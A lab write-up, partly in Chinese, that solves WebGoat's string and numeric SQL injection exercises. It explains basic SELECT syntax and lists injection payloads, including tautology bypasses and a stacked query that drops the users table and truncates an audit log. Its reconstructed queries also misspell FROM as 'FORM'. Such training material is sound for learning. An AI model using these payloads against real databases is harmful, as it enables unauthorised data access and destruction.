# [ Webgoat - 2 ] SQL Injection ## 題目 : ![](https://i.imgur.com/XXVW8Le.png) ![](https://i.imgur.com/Xry4cui.png) ### Try It! ***String SQL Injection*** The query in the code builds a dynamic query as seen in the previous example. The query in the code builds a dynamic query by concatenating strings making it susceptible to ***String SQL injection***: ![](https://i.imgur.com/LpV9fIq.png) Using the form below try to retrieve all the users from the users table. You shouldn’t need to know any specific user name to get the complete list, however you can use 'Smith' to see the data for one user. ![](https://i.imgur.com/zAluSpl.png) --------------------------------------------------------------- ![](https://i.imgur.com/XXVW8Le.png) ![](https://i.imgur.com/c1G9Cpg.png) ### Try It! ***Numeric SQL Injection*** The query in the code builds a dynamic query as seen in the previous example. The query in the code builds a dynamic query by concatenating a number making it susceptible to ***Numeric SQL injection***: ![](https://i.imgur.com/nsQXL1z.png) Using the form below try to retrieve all the users from the users table. You shouldn’t need to know any specific user name to get the complete list, however you can use '101' to see the data for one user. ![](https://i.imgur.com/sOMg1vf.png) ## 解題 : ### SQL 語法 : " SELECT * FORM users WHERE LAST_NAME = '" + userName + "'" ; <font color="blue">SELECT "欄位名" FROM "表格名"; ( * : 表示取出所有欄位)</font> <font color="blue">WHERE + 條件 ;</font> ---> 取出 users 中 LAST_NAME = userName (你所查詢的內容) 的所有欄位 #### 舉例: ==**Store_Information**== 表格 : | ==Store_Name== | ==Sales== | ==Txn_Date== | | -------- | -------- | -------- | | Los Angeles | 1500 | 05-Jan-1999 | | San Diego | 250 | 07-Jan-1999 | | Boston | 700 | 08-Jan-1999 | 若要選出所有的店名 (Store_Name),我們就鍵入: `SELECT Store_Name FROM Store_Information;` 輸出: ``` Los Angeles San Diego Boston ``` ### Wegoat 攻擊範例 ( 提示 ) : #### Attacker supplies unexpected text ``` userName = Smith' or '1'='1 userName =' or 1=1 -- userID = 1234567 or 1=1 UserName = Smith';drop table users; truncate audit_log;-- ``` #### Application executes query ``` select * from users where name = 'Smith' or '1' = '1' select * from users where name = 'Smith' or TRUE select * from users where employee_id = 1234567 or 1=1 ``` ### 解答 : ``` 7. ' or '1' = '1 8. 101 or 1 = 1 ``` <font color="RED">!注入成功</font> ### 注入後之網頁後端程式碼 #### 7. SELECT * FORM users WHERE LAST_NAME = '' or '1' = '1'; ![](https://i.imgur.com/y6Ru9Yi.png) #### 8. SELECT * FORM users WHERE USERID = 101 or 1 = 1; ![](https://i.imgur.com/G10SU6l.png) ###### tags: `webgoat` `SQL Injection` `CTF`